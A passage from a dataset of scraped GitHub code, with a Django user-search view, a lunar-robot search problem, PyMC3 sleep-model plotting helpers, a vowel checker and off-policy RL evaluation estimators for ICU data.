nickname = data['nickname']\n            gender = data['gender']\n            similar = data['similar']\n            similar_tags = list(request.user.profile.tags.names())\n\n            if nickname:\n                users = User.objects.filter(username=nickname)\n            if gender:\n                users = User.objects.filter(username__in=list(users), profile__gender=gender)\n            if similar:\n                users = User.objects.filter(username__in=list(users), profile__tags__name__in=similar_tags)\n\n            if len(users) == 0:\n                reserve_users = User.objects.all().exclude(id=request.user.id)\n\n            context = {\n                'form': form,\n                'users' : users,\n                'reserve_users' : reserve_users\n            }\n            return render(request, 'search/user_search.html', context=context)\n\n    else:\n        form = SearchForm()\n\n    context = {\n        'users' : users,\n        'form' : form,\n        'reserve_users': reserve_users,\n    }\n\n\n\n    return render(request, 'search/user_search.html', context=context)","repo_name":"ramses314/Portfolio","sub_path":"network/mysite/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"32680787645","text":"# Moon exploration robot\n# NOTE: assumes a SearchProblem base class (e.g. from simpleai.search) is importable\n# grid legend: B = base, M = sample (muestra)\n#    0 1 2 3 \n#    - B M M\n#    - - - -\n#    M - - - \n#    - M - -\n\nMUESTRAS = ((0,2),(0,3),(2,0),(3,1))\nBATERIA = 1000\nGASTO_IR = 100\nGASTO_DEPOSITAR_MUESTRA = 50\nGASTO_TOMAR_MUESTRA = 250\n\nBASE = (0,1)\nMuestras_Depositadas = []\n# robot position, battery, samples\nINITIAL_STATE = (BASE, BATERIA, Muestras_Depositadas)\n\ndef CalcularGastoBateria(posicion):\n    posx,posy = posicion\n    MovimientosVuelta = abs(BASE[0]-posx) + abs(BASE[1]-posy)\n\n    return MovimientosVuelta * GASTO_IR\n\nclass ExploracionLunar(SearchProblem):\n    \n    def isGoal(self, state):\n        posicion_robot, bat, Muestra_Depositadas = state\n        return len(MUESTRAS) == len(Muestra_Depositadas)\n\n    def actions(self,state):\n        posicion_robot, bat, Muestra_Depositadas = state\n        fila, columna = posicion_robot\n        available_actions = []\n\n        if posicion_robot == BASE:\n            # if I'm at the base, I should be able to recharge\n            available_actions.append(('Cargar', posicion_robot))\n\n            # if I'm carrying a sample waiting to be deposited, I must be able to deposit it\n            if len(MUESTRAS) != 0:\n                # at this point just knowing that the task is to deposit would be enough\n                available_actions.append(('DepositarMuestra', posicion_robot))\n\n        if posicion_robot in MUESTRAS:\n            # if I'm on a point of interest, I must be able to take the sample\n
            available_actions.append(('AgregarMuestra', posicion_robot))\n\n\n        if bat > CalcularGastoBateria(posicion_robot):\n            # I can move anywhere on the board as long as the current battery\n            # still lets me get back to the base to recharge\n            movimientos_posibles = []\n            if fila>0:\n                movimientos_posibles.append((fila-1, columna))\n            if fila <3:\n                movimientos_posibles.append((fila+1, columna))\n            if columna>0:\n                movimientos_posibles.append((fila, columna-1))\n            if columna<3:\n                movimientos_posibles.append((fila, columna+1))\n\n            for mov in movimientos_posibles:\n                available_actions.append(('Ir', mov))\n\n        return available_actions\n\n    def results(self, state, action):\n        posicion_robot, bat, Muestra_Depositadas = state\n        tipo_accion, robot = action\n        if tipo_accion == 'Ir':\n            posicion_robot = robot\n            bat -= GASTO_IR\n        if tipo_accion == 'DepositarMuestra':\n            Muestra_Depositadas.append(posicion_robot)\n            bat -= GASTO_DEPOSITAR_MUESTRA\n        if tipo_accion == 'AgregarMuestra':\n            bat -= GASTO_TOMAR_MUESTRA\n        if tipo_accion == 'Cargar':\n            bat = BATERIA\n        return (posicion_robot,bat,Muestra_Depositadas)\n\n\n    def cost(self,state1,action,state2):\n        tipo_accion, robot = action\n        costo = 0\n        if tipo_accion == 'Ir':\n            costo = 5\n        if tipo_accion == 'DepositarMuestra':\n            costo = 10\n        if tipo_accion == 'AgregarMuestra':\n            costo = 15\n        if tipo_accion == 'Cargar':\n            costo = 30\n        return costo\n\n    def heuristic(self, state):\n        posicion_robot, bat, Muestra_Depositadas = state\n        costo_heuristic = 0\n        # for every sample still to be deposited, the robot will at minimum have to visit\n        # that position, not counting whether the current one is a zone of interest\n        \n        for muestra in MUESTRAS:\n            if muestra not in Muestra_Depositadas and posicion_robot != muestra:\n                costo_heuristic += 5\n\n        return costo_heuristic \n\n\n\n\n    ","repo_name":"Manumusso/Pr-cticaIA","sub_path":"Búsqueda/ExploraciónLunar/#Robot de exploración luna.py","file_name":"#Robot de exploración luna.py","file_ext":"py","file_size_in_byte":3685,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23499823092","text":"import pymc3 as pm\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom scipy.stats import mode\nimport pandas as pd\nimport seaborn as sns\nsns.set(font_scale=1)\nsns.set_style(\"whitegrid\", {'axes.grid' : False})\nfrom mednickdb_pysleep.pysleep_utils import pd_to_xarray_datacube\nsns.set_palette(sns.color_palette(\"Set1\", n_colors=8, desat=.5))\nfrom seaborn.relational import scatterplot\n# Bigger than normal fonts\n\n\ndef model_parameters(trace, varnames=None):\n    summary_df = pm.summary(trace, varnames=varnames)\n    print(summary_df)\n    axs = pm.traceplot(trace, varnames=varnames)\n    return summary_df, axs\n\n\ndef stage_parameters(trace, stage_param_names, stage_map, label_plot=True):\n    stage_map = {v:k for k,v in stage_map.items()}\n    _, axs = model_parameters(trace, stage_param_names)\n    for param in stage_param_names:\n        if trace[param].dtype == np.float64:\n            means = extract_mean_as_array(trace, param, 'df')\n            print(param, ':\\n', sep='')\n            for idx, row in means.iterrows():\n                stage_str = [stage_map[row[level]] for level in row.index if level != param]\n                print(stage_str, row[param])\n                if label_plot:\n                    axs[0, 0].axvline(row[param], linewidth=0.5, linestyle='--', color='r')\n                    axs[0,0].text(row[param],\n                                  (axs[0,0].get_ylim()[1] - axs[0,0].get_ylim()[0])/np.random.normal(loc=2, scale=0.5),\n                                  '_'.join(stage_str), rotation=45)\n\n    plt.show()\n\n\n\n\ndef extract_mode_as_array(trace, 
var='z', astype='array'):\n\n    def trace_mode(x):\n        return pd.Series(mode(x).mode[0], name='mode')\n\n    df = pm.summary(trace, stat_funcs=[trace_mode], varnames=[var])\n    df = df.reset_index()\n\n    def split_fun(x):\n        if '__' in x:\n            return [int(x) for x in x.split('__')[1].split('_')]\n        else:\n            return [0]\n\n    df['var type'] = df['index'].apply(lambda x: x.split('__')[0])\n    df = df.loc[df['var type'] == var, :]\n    var_idxs = df['index'].apply(split_fun)\n    indexs = np.stack(var_idxs)\n    if astype == 'array':\n        sizes = indexs.max(axis=0) + 1\n        var_array = df['mode'].copy().values.reshape(sizes)\n        return var_array\n    else:\n        df_out = pd.DataFrame(np.concatenate([indexs, np.expand_dims(df['mode'].values, -1)], axis=1))\n        df_out.columns = list(df_out.columns[:-1]) + [var]\n        return df_out\n\n\ndef extract_mean_as_array(trace, var='z', astype='array'):\n    df = pm.summary(trace)\n    df = df.reset_index()\n\n    def split_fun(x):\n        if '__' in x:\n            return [int(x) for x in x.split('__')[1].split('_')]\n        else:\n            return [0]\n\n    df['var type'] = df['index'].apply(lambda x: x.split('__')[0])\n    df = df.loc[df['var type'] == var, :]\n    var_idxs = df['index'].apply(split_fun)\n    indexs = np.stack(var_idxs)\n    if astype == 'array':\n        sizes = indexs.max(axis=0)+1\n        var_array = df['mean'].copy().values.reshape(sizes)\n        return var_array\n    else:\n        df_out = pd.DataFrame(np.concatenate([indexs, np.expand_dims(df['mean'].values, -1)], axis=1))\n        idx_cols = [str(i) for i in df_out.columns[:-1]]\n        df_out.columns = idx_cols+[var]\n        if astype == 'xarray':\n            return pd_to_xarray_datacube(df_out, idx_cols, value_col=var)\n        else:\n            return df_out\n\n\ndef gen_data_for_plot(data, x, z=None, rand_sample_vars=[], mean_sample_vars=[], const_vars={}, stages='balanced', nstages=5, samples_per_x_range=500, truncate_to_percentile=0):\n    \"\"\"\n    Generate some data that we can use to plot posterior/param values for\n    :param data: data used to train model, so that levels of x are known\n    :param x: continuous data for x axis\n    :param z: categorical data for y axis\n    :param rand_sample_vars:\n    :return:\n    \"\"\"\n    data_points = data.copy()\n    unq_x = data[x].unique()\n    if len(unq_x) < 7: # categorical\n        x_data = data[x].sample(samples_per_x_range).values\n    else:\n        if truncate_to_percentile:\n            x_data = np.linspace(np.percentile(data[x],truncate_to_percentile), np.percentile(data[x],100-truncate_to_percentile), samples_per_x_range)\n        else:\n            x_data = np.linspace(data[x].min(), data[x].max(), samples_per_x_range)\n    df = pd.DataFrame({x:x_data})\n    for var in mean_sample_vars:\n        var_mean = data[var].mean(skipna=True)\n        var_std = data[var].std(skipna=True)\n        df[var] = var_mean\n        data_points = data_points.loc[(var_mean-var_std < data_points[var]) & (data_points[var] < var_mean+var_std)]\n\n    data_cont = []\n    unique_z = data[z].unique()\n    if len(unique_z) >= 7: # make cont into categorical\n        unique_z = np.linspace(data[z].min(), data[z].max(), 7)\n        unique_z += (unique_z[1] - unique_z[0])/2\n        unique_z = unique_z[:-1]\n\n    for z_val in unique_z:\n        new_df = df.copy()\n        new_df[z] = z_val\n        data_cont.append(new_df)\n    df = pd.concat(data_cont, axis=0)\n\n    return df, data_points\n\n\n\ndef pairplot_divergence(trace, ax=None, divergence=True, color='C3', divergence_color='C2'):\n    theta = trace.get_values(varname='theta', combine=True)[:, 0]\n    logtau = trace.get_values(varname='tau_log__', combine=True)\n    if not ax:\n        _, ax = plt.subplots(1, 1, figsize=(10, 5))\n    ax.plot(theta, logtau, 'o', color=color, alpha=.5)\n    if divergence:\n        divergent = trace['diverging']\n        ax.plot(theta[divergent], logtau[divergent], 'o', color=divergence_color)\n    ax.set_xlabel('theta[0]')\n    ax.set_ylabel('log(tau)')\n    
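# a cluster of divergent points (drawn in divergence_color) in one corner of this plane\n    # often signals funnel-like posterior geometry that the sampler cannot traverse\n    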
ax.set_title('scatter plot between log(tau) and theta[0]');\n return ax\n\n\ndef plot_vars(mod, data, x, y, facet_row=None, facet_col=None, hue=None, style=None, y_levels=None, y_level_name='set_y_level_name',\n maps=None, data_points=None, mean_center_means=None, vars_to_label=None,\n num_draws_from_params=100, out_of_sample=True, combine_trace=False, legend='full', points_alpha=0.01):\n for var_name in mod.input_vars:\n if 'consider' in var_name:\n mod.input_vars[var_name].set_value(data[var_name].iloc[0])\n else:\n mod.input_vars[var_name].set_value(data[var_name])\n\n\n vars_ppc = [v for v in [x, y, hue, facet_col, facet_row, style] if v is not None and v != y_level_name]\n\n pps = mod.sample_posterior_predictive(vars=vars_ppc, num_draws_from_params=num_draws_from_params, out_of_sample=out_of_sample)\n\n df_ppc_cont = []\n for var in vars_ppc:\n label = [var] if (y_levels is None) or (var!=y) else y_levels\n df_ppc_var_cont = []\n for ppc_idx, ppc_sample in enumerate(pps[var]):\n df_ppc_var = pd.DataFrame(ppc_sample, columns=label)\n df_ppc_var['ppc_idx'] = ppc_idx\n df_ppc_var_cont.append(df_ppc_var)\n df_ppc = pd.concat(df_ppc_var_cont, axis=0)\n if var != vars_ppc[-1]:\n df_ppc = df_ppc.drop('ppc_idx', axis=1)\n df_ppc_cont.append(df_ppc)\n df = pd.concat(df_ppc_cont, axis=1)\n\n if maps:\n for col in df.columns:\n if col in maps:\n df[col] = df[col].map({v:k for k,v in maps[col].items()})\n\n if y_levels is not None:\n vars_ppc.remove(y)\n df = df.melt(id_vars=['ppc_idx']+vars_ppc, value_vars=y_levels, var_name=y_level_name, value_name=y).reset_index()\n hue = hue if y_level_name == facet_row or y_level_name == facet_col else y_level_name\n\n # if mean_center_means is not None:\n # for var in mean_center_means:\n # df[var] += df[var]*mean_center_means[var]['sd']+mean_center_means['mean']\n\n # df_prev = df.drop(['index', 'ppc_idx'], axis=1).groupby(\n # ['previous_bout', 'current_epoch', 'feature']).mean().reset_index()\n # df_prev.to_csv(\n # '../../data/processed/previous_bout_feature.csv')\n\n # df_prev = pd.read_csv('../../data/processed/previous_bout_feature.csv')\n #\n # df_current = df.drop(['index', 'ppc_idx'], axis=1).groupby(\n # ['current_epoch', 'feature']).mean().reset_index()\n # df_current.to_csv('../../data/output/current_bout_feature.csv')\n #\n # df_merged = pd.merge(df_current,df_prev, on=['current_epoch','feature'])\n # df_merged['Difference when inc previous stage'] = df_merged['feature_rate_p_x'] - df_merged['feature_rate_p_y']\n # df_merged['Trans P when marginalizing over previous stage'] = df_merged['feature_rate_p_x']\n # df_merged['Trans P inc previous stage'] = df_merged['feature_rate_p_y']\n # df_merged.drop(['feature_rate_p_y','feature_rate_p_x','Unnamed: 0'], axis=1).to_csv('../../data/output/full_feature_p.csv')\n\n\n if combine_trace:\n g = sns.relplot(data=df, x=x, y=y, hue=hue, kind='line', col=facet_col, row=facet_row, style=style, facet_kws={'sharex':False, 'sharey':False},\n legend=legend)#hue_order=['F','M'], hue_order=['waso','wbso','n1','n2'])#, row_order=['waso','n1','n2','n3','rem'], col_order=['waso','n1','n2','n3','rem'])\n else:\n g = sns.relplot(data=df, x=x, y=y, hue=hue, kind='line', col=facet_col, row=facet_row, style=style, estimator=None, units='ppc_idx', alpha=0.1,\n facet_kws={'sharex': False, 'sharey': False}, legend=legend, row_order=['waso','n1','n2','n3','rem'], col_order=['F','M'])#, hue_order=['n3','waso','n1','n2']) #for running with rem & previous bout\n if mean_center_means is not None and x in mean_center_means:\n for 
ax in g.axes.flatten():\n            labels = np.round(ax.get_xticks()*mean_center_means[x]['std']+mean_center_means[x]['mean'],0)\n            if x=='clocktime':\n                labels[labels>12] = labels[labels>12]-12\n                ax.set_xticklabels(labels=['%0.0f' % l for l in labels])\n            else:\n                ax.set_xticklabels(labels=labels)\n\n\n    #plt.ylim([0, 10])\n    if data_points is not None:\n        if y_levels is not None:\n            data_points = data_points.melt(id_vars=vars_ppc, value_vars=y_levels, var_name=y_level_name,\n                                           value_name=y).reset_index()\n\n        data_points = data_points.sample(df.shape[0], replace=True) #FIXME only plot real points here, dont sample more, turn oversamples to alpha=0\n        g.data = data_points\n        g.map_dataframe(scatterplot, x, y, hue=hue, size=0.02, alpha=points_alpha) #need to deal with style and coloring datapoints.\n        # to_groupby = [v for v in [facet_row, facet_col] if v is not None]\n        # if len(to_groupby) > 0:\n        #     df = df.set_index(to_groupby)\n        #     for idxs, data_slice in data_points.groupby(to_groupby):\n        #         iloc_idx = []\n        #         if ~isinstance(idxs,list): #FIXME maybe this need to be numpy array\n        #             idxs = [idxs]\n        #         for i in idxs:\n        #             if hasattr(g, 'row_names') and i in g.row_names:\n        #                 iloc_idx.append(g.row_names.index(i))\n        #             else:\n        #                 iloc_idx.append(0)\n        #             if hasattr(g, 'col_names') and i in g.col_names:\n        #                 iloc_idx.append(g.col_names.index(i))\n        #\n        #         if len(iloc_idx) < len(g.axes.shape):\n        #             iloc_idx.append(0)\n        #         idxs = tuple(iloc_idx)\n        #         #g.axes[idxs].set_xlim((data_slice.loc[:,x].min(), data_slice.loc[:,x].max()))\n        #         #g.axes[idxs].set_ylim((data_slice.loc[:,y].min(), data_slice.loc[:,y].max()))\n        #         if vars_to_label is not None:\n        #             df_slice = df[idxs]\n        #             x_text = (data_slice.loc[:,x].max()-data_slice.loc[:,x].min())/2\n        #             x_sd = (data_slice.loc[:,x].max()-data_slice.loc[:,x].min())/10\n        #             y_sd = (data_slice.loc[:,y].max()-data_slice.loc[:,y].min())/10\n        #             for var_to_label in vars_to_label:\n        #                 for style_i, style_data in df_slice.groupby(var_to_label):\n        #                     y_text = style_data.loc[(style_data[x] < x_text+x_sd) & (style_data[x] > x_text-x_sd), y].iloc[0]\n        #                     g.axes[idxs].annotate(style,\n        #                                           xy=(x_text, y_text), xycoords='data',\n        #                                           xytext=(x_text+0.1*x_sd, y_text+0.1*y_sd),\n        #                                           textcoords='data',\n        #                                           size=16, va=\"center\", ha=\"center\",\n        #                                           bbox=dict(boxstyle=\"round\", fc=\"w\"),\n        #                                           arrowprops=dict(arrowstyle=\"-|>\",\n        #                                                           connectionstyle=\"arc3,rad=-0.2\",\n        #                                                           fc=\"w\"))\n    return g\n\n\n\n\n\n","repo_name":"bdyetton/PSleep","sub_path":"src/modeling/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":13744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"72403206956","text":"def verificar_vogal(caracter):\n    if caracter == 'a' or caracter == 'e' or caracter == 'i' or caracter == 'o' or caracter == 'u':\n        return True\n    else:\n        return False\n\ndef verificar_caracter_especial(caracter):\n    if (ord(caracter) < 97 or ord(caracter) > 122):\n        return True\n    else:\n        return False\n\ncaracter = input(\"Caracter: \") \ncaracter_minusculo = caracter.lower()  # lowercase right away to simplify the special-character check \n\nif verificar_vogal(caracter_minusculo):\n    print(\"O caracter é uma vogal\")\n\nelif not verificar_caracter_especial(caracter_minusculo):\n    print(\"O caracter é uma consoante\")\n\nelse:\n    print(\"Caracter inválido\")\n","repo_name":"CarlosModinez/LABIC","sub_path":"Aulas python/Primeira lista de 
exercicios/Exercicio_5.py","file_name":"Exercicio_5.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16276433424","text":"import numpy as np\nimport pandas as pd\nimport math\nfrom functools import partial\nimport itertools\n\ndef unscale_result(value, original_range=(-100, 100)):\n return value * (original_range[1] - original_range[0])+original_range[0]\n\ndef ois_sa_weights(dataset, e_policy, b_policy):\n # definition ois weights\n # ois_weights = e_policy / b_policy\n assert not ((b_policy == 0.0) & (e_policy > 0.0)).any(), \"Evaluation policy should have some support in behavior policy\"\n pi_b_as = dataset.apply(lambda x: b_policy[x.state, x.action_discrete], axis=1)\n pi_e_as = dataset.apply(lambda x: e_policy[x.state, x.action_discrete], axis=1)\n ois_weights = pi_e_as / pi_b_as\n return ois_weights\n\ndef ois_traj_weights(dataset, e_policy, b_policy):\n # store ois weight for each state-action pair in the trajectory\n ds = dataset.copy()\n ds['ois_weight'] = ois_sa_weights(ds, e_policy, b_policy)\n traj_weights = ds.groupby('icustay_id')['ois_weight'].transform('prod')\n return traj_weights\n\ndef ois_value_trajectory(dataset, e_policy, b_policy):\n \"\"\"\n Ordinary trajectory-based importance sampling as defined by Sutton & Barto 2nd ed., eq. 5.4 on page 104.\n \"\"\"\n traj_weights = ois_traj_weights(dataset, e_policy, b_policy)\n # multipliy importance weights in trajectory to determine trajectory importance weight (IW-T)\n # multiply traj IW-T with discounted return of trajectory\n ois_returns = traj_weights * dataset.traj_return\n return ois_returns\n\ndef ois_policy(dataset, e_policy, b_policy):\n ds = dataset.copy()\n ds['ois_returns'] = ois_value_trajectory(dataset, e_policy, b_policy)\n ds['ois_traj_weights'] = ois_traj_weights(dataset, e_policy, b_policy)\n ois_returns_stay = ds.groupby('icustay_id').first()['ois_returns']\n traj_weights_stay = ds.groupby('icustay_id').first()['ois_traj_weights']\n expectation = ois_returns_stay.mean()\n variance = np.var( ois_returns_stay * traj_weights_stay) / len(dataset)\n return (expectation, variance)\n\ndef phwis_policy(dataset, e_policy, b_policy):\n ds = dataset.copy()\n ds['traj_weights'] = ois_traj_weights(dataset, e_policy, b_policy)\n ds['traj_value'] = ois_value_trajectory(dataset, e_policy, b_policy)\n weights_vals = ds.groupby('icustay_id')[['traj_weights', 'traj_value', 'traj_len']].first()\n # TODO FdH: what is a 'fair' default? 0.0 is according to S&B p. 
105, but it does not take into account negative rewards.\n    if weights_vals['traj_weights'].sum() == 0:\n        wis_policy = 0 # according to S&B p 105\n    else:\n        wis_policy = 0\n        n_total_trajs = dataset.icustay_id.nunique()\n        traj_lens = ds.groupby('icustay_id').traj_len.first()\n        for l in traj_lens.unique():\n            subset = weights_vals[weights_vals.traj_len == l]\n            if subset['traj_weights'].sum() > 0.0:\n                wis_policy += (len(subset)/ n_total_trajs) * (subset['traj_value'].sum() / subset['traj_weights'].sum())\n    # determine WIS variance estimation according to \"Aslett, Coolen & De Bock\", page 30\n    var = wis_var(wis_policy, ds.groupby('icustay_id')['traj_return'].first(), weights_vals['traj_weights'])\n    return wis_policy, var, ds.groupby('icustay_id')['traj_weights'].first()\n\ndef wis_var(wis_policy, traj_returns, traj_weights):\n    \"\"\"\n    Inputs:\n    * wis policy: OPE estimation\n    * traj_returns: returns of trajectories as observed in the dataset\n    * traj_weights: OPE estimation weights\n    According to \"Aslett, Coolen & De Bock\", page 30\n    \"\"\"\n    traj_w_sq_norm = (traj_weights / traj_weights.sum()) ** 2\n    traj_sq_err = (traj_returns - wis_policy) ** 2\n    assert traj_w_sq_norm.shape == traj_sq_err.shape, \"Inputs should have compatible shape\"\n    assert traj_w_sq_norm.shape[0] == len(traj_returns), \"Inputs should have compatible shape\"\n    sigm_sq = (traj_w_sq_norm * traj_sq_err).sum()\n    variance = sigm_sq.mean()\n    return variance\n\ndef wis_policy(dataset, e_policy, b_policy):\n    \"\"\"\n    Weighted trajectory-based importance sampling as defined by Sutton & Barto, page 104/105.\n    \"\"\"\n    ds = dataset.copy()\n    ds['traj_weights'] = ois_traj_weights(dataset, e_policy, b_policy)\n    ds['traj_value'] = ois_value_trajectory(dataset, e_policy, b_policy)\n    weights_vals = ds.groupby('icustay_id')[['traj_weights', 'traj_value']].first()\n    # TODO FdH: what is a 'fair' default? 0.0 is according to S&B p. 105, but it does not take into account negative rewards.\n
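    # WIS normalizes by the summed trajectory weights (self-normalized importance sampling):\n    # it is slightly biased but typically has far lower variance than ordinary IS.\n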
    if weights_vals['traj_weights'].sum() == 0:\n        wis_policy = 0 # according to S&B p 105\n    else:\n        wis_policy = weights_vals['traj_value'].sum() / weights_vals['traj_weights'].sum()\n    # determine WIS variance estimation according to \"Aslett, Coolen & De Bock\", page 30\n    var = wis_var(wis_policy, ds.groupby('icustay_id')['traj_return'].first(), weights_vals['traj_weights'])\n    return wis_policy, var, ds.groupby('icustay_id')['traj_weights'].first()\n\n\ndef wdr_inner(ds, e_policy, b_policy, gamma):\n    sa_weights = ois_sa_weights(ds, e_policy, b_policy)\n    assert sa_weights.isna().sum() == 0, \"sa weight is nan somewhere in wdr_inner\"\n    ds['sa_weights'] = sa_weights / sa_weights.sum()\n    first_states = ds.sort_values(['icustay_id', 'start_time']).groupby('icustay_id').first()\n    term_a = first_states.v_estimate.mean()\n    assert not np.isnan(term_a), \"term_a is nan in wdr_inner\"\n    ds['term_b'] = ds.reward - ds.q_estimate + gamma * ds.next_v_estimate\n    assert ds['term_b'].isna().sum() == 0, \"term_b is nan somewhere in wdr_inner\"\n    ds['weighted_sa'] = ds.gamma * ds.sa_weights * ds.term_b\n    weighted_traj = ds.groupby('icustay_id').weighted_sa.sum()\n    assert not np.isnan(weighted_traj).any(), \"weighted_traj is somewhere nan in wdr_inner\"\n    summed_weighted_traj = weighted_traj.sum()\n    assert not np.isnan(summed_weighted_traj), \"summed_weighted_traj is nan in wdr_inner\"\n    return term_a, term_a + summed_weighted_traj\n\ndef wdr_policy(dataset, e_policy, b_policy, q_e_estimator, v_e_estimator, gamma):\n    \"\"\"\n    Weighted doubly robust estimator as introduced in Equation 2 of ''Data-Efficient\n    Off-Policy Policy Evaluation for Reinforcement Learning'' by Thomas & Brunskill 2016.\n    Takes as input a dataset of trajectories, an evaluation policy, a behavior policy, a\n    state-value estimator for the evaluation policy 'v_e_estimator' and a state-action value\n    estimator 'q_e_estimator'.\n    \"\"\"\n    ds = dataset.copy()\n    ds['v_estimate'] = ds.state.apply(v_e_estimator)\n    assert ds['v_estimate'].isna().sum() == 0, \"V estimate is nan somehwere\"\n    ds['next_v_estimate'] = ds.state.apply(v_e_estimator).shift(-1).fillna(0.0) # reward is 0 for terminal absorbing states\n    ds['q_estimate'] = ds[['state', 'action_discrete']].apply(q_e_estimator, axis=1)\n    assert ds['q_estimate'].isna().sum() == 0, \"Q estimate is nan somehwere\"\n    ds['gamma'] = ds.traj_count.apply(lambda x: gamma ** x)\n    return wdr_inner(ds, e_policy, b_policy, gamma)\n\ndef phwdr_policy(dataset, e_policy, b_policy, q_e_estimator, v_e_estimator, gamma):\n    \"\"\"\n    Per-horizon weighted doubly robust estimator as introduced in Appendix A of\n    ''Behaviour Policy Estimation in Off-Policy Policy Evaluation: Calibration\n    Matters'' by Raghu et al. 2018.\n
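    Trajectories are grouped by horizon (trajectory length); each group's WDR estimate\n    is weighted by that group's share of all trajectories.\n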
    Takes as input a dataset of trajectories, an evaluation policy, a behavior policy, a\n    state-value estimator for the evaluation policy 'v_e_estimator' and a state-action value\n    estimator 'q_e_estimator'.\n    \"\"\"\n    # TODO FdH: implement\n    ds = dataset.copy()\n    ds['v_estimate'] = ds.state.apply(v_e_estimator)\n    ds['next_v_estimate'] = ds.state.apply(v_e_estimator).shift(-1).fillna(0.0) # reward is 0 for terminal absorbing states\n    ds['q_estimate'] = ds[['state', 'action_discrete']].apply(q_e_estimator, axis=1)\n    ds['gamma'] = ds.traj_count.apply(lambda x: gamma ** x)\n    n = ds.icustay_id.nunique()\n    phwdr_result = 0.0\n    for l in ds.traj_len.unique():\n        subset = ds[ds.traj_len == l]\n        n_subset = subset.icustay_id.nunique()\n        _, wdr_inner_result = wdr_inner(subset, e_policy, b_policy, gamma)\n        phwdr_inner = wdr_inner_result * (n_subset / n)\n        assert not np.isnan(phwdr_result), \"phwdr is nan for length {}\".format(l)\n        phwdr_result += phwdr_inner\n    return phwdr_result\n\n\ndef infer_estimators_tabular(dataset, policy, gamma, k):\n    \"\"\"\n    Infers Q and V estimators for a given policy using FQE.\n    \"\"\"\n    n_actions = policy.shape[1]\n    n_states = policy.shape[0]\n    q_estimate = np.zeros(shape=(n_states, n_actions))\n    v_estimate = np.zeros(shape=n_states)\n    for i in range(k):\n        targets = [[[] for _ in range(n_actions)] for _ in range(n_states)]\n        for row in dataset[['state', 'action_discrete', 'reward', 'next_state']].itertuples():\n            s, a, r, ns = row.state, row.action_discrete, row.reward, row.next_state\n            nqv = 0\n            assert not np.isnan(r), \"reward is nan for {}\".format((s,a,ns))\n            if ns < n_states:\n                # use a separate loop variable so the action index a of the current\n                # transition is not clobbered before targets[s][a] is updated\n                for na in range(n_actions):\n                    assert not np.isnan(q_estimate[ns, na]), \"q_estimate is nan for {}\".format((s,na))\n                    assert not np.isnan(policy[ns, na]), \"policy is nan for {}\".format((s,na))\n                    nqv += q_estimate[ns, na] * policy[ns, na]\n                targets[s][a].append(r + gamma * nqv)\n            else:\n                targets[s][a].append(r)\n        for s, a in itertools.product(range(n_states), range(n_actions)):\n            if len(targets[s][a]) > 0:\n                q_estimate[s, a] = sum(targets[s][a]) / len(targets[s][a])\n    for s in range(n_states):\n        v_estimate_s = 0\n        for a in range(n_actions):\n            assert np.isnan(policy[s, a]).sum() == 0, \"policy is nan for {}\".format((s,a))\n            assert np.isnan(q_estimate[s, a]) == 0, \"q_estimate is nan for {}\".format((s,a))\n            v_estimate_s += q_estimate[s, a] * policy[s, a]\n        v_estimate[s] = v_estimate_s\n        assert not np.isnan(v_estimate[s]), \"v estimate is nan for {}\".format(s)\n    return q_estimate, v_estimate\n\ndef infer_estimators_func(dataset, policy, gamma, k):\n    def get_from_tabular_sa(tabular, sa):\n        return tabular[sa[0], sa[1]]\n    def get_from_tabular_s(tabular, state):\n        return tabular[state]\n    q_tabular, v_tabular = infer_estimators_tabular(dataset, policy, gamma, k)\n    return partial(get_from_tabular_sa, q_tabular), partial(get_from_tabular_s, v_tabular)\n\n\ndef inner_ess(importance_weights):\n    \"\"\"\n    helper function to compute effective sample sizes.\n    \"\"\"\n    normalized_importance_weights = importance_weights / importance_weights.sum()\n    return (normalized_importance_weights ** 2).sum()\n\ndef ess(importance_weights):\n    \"\"\"\n    Returns the effective sample size according to the standard definition for importance sampling by Kong (1992).\n    \"\"\"\n    ess = inner_ess(importance_weights)\n    if ess == 0.0:\n        return 0.0\n    else:\n        return 1.0 / inner_ess(importance_weights)\n\ndef hcope(dataset, e_policy, b_policy, c, delta, unscale=True, optimized=True):\n    \"\"\"\n    High-confidence off policy evaluation for 
a given dataset, evaluation\n policy, behavior policy, c and delta. Returns the estimated lower bound of the mean\n for a 1-delta confidence level in the original scale of unscale=True.\n If unscale=False, the result is given on the returns scaled to [0,1].\n If optimized=True, it uses an implementation that requires only a single pass over the data.\n \"\"\"\n assert c > 0, \"c parameter should be > 0, given {}\".format(c)\n assert 0 < delta < 1, \"delta parameter should be in (0,1), given {}\".format(delta)\n ds = dataset.copy()\n # scale the trajectory returns to [0, 1]\n return_min, return_max = ds.traj_return.min(), ds.traj_return.max()\n ds['traj_value'] = ois_value_trajectory(ds, e_policy, b_policy)\n traj_values = ds.groupby('icustay_id')['traj_value'].first()\n n = len(traj_values)\n# if c > traj_values.max():\n# raise ValueError(\"c of {} bigger than max of {}\".format(c, traj_values.max()))\n cs = np.repeat(c, n)\n Y = np.minimum(traj_values, cs)\n if optimized:\n hcope_result = _hcope_singlepass(Y, cs, delta)\n else:\n hcope_result = _hcope_thm1(Y, cs, delta)\n if unscale:\n result = unscale_result(hcope_result, original_range=(return_min, return_max))\n else:\n result = hcope_result\n return result\n\ndef _hcope_thm1(Y, cs, delta):\n \"\"\"\n Implemented according to Thm.1 in Thomas, Teocharous and Ghavamzadeh (2015).\n Assumes cs is an array with constant value.\n \"\"\"\n n = len(Y)\n empirical_mean = Y.mean()\n second_term = ((1 / cs).sum() ** -1) * ((7*n*np.log(2/delta))/(3*(n-1)))\n third_term_sum = 0\n c = cs[0]\n for i in Y:\n for j in Y:\n third_term_sum += ((i/c) - (j/c))**2\n third_term = ((1/ cs).sum() ** -1) * math.sqrt((np.log(2/delta)/(n-1))*third_term_sum)\n return empirical_mean - second_term - third_term\n\ndef _hcope_singlepass(Y, cs, delta):\n \"\"\"\n Implemented according to Remark 3 in Thomas, Teocharous and Ghavamzadeh (2015).\n 